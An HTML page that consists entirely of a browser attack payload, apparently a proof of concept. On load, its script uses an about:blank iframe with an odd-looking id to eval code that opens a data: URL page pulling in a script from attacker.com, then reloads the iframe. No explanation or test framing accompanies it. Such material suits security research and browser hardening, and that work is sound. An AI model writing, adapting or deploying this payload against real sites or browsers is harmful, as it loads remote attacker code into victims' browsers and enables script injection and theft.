<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGrfqZdGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGrfqZdGGGGG.onload=_=>GGGGGrfqZdGGGGG.contentWindow.eval("window.open('data:text/html,<script src=https://attacker.com/static/static.js><\/script>')");GGGGGrfqZdGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>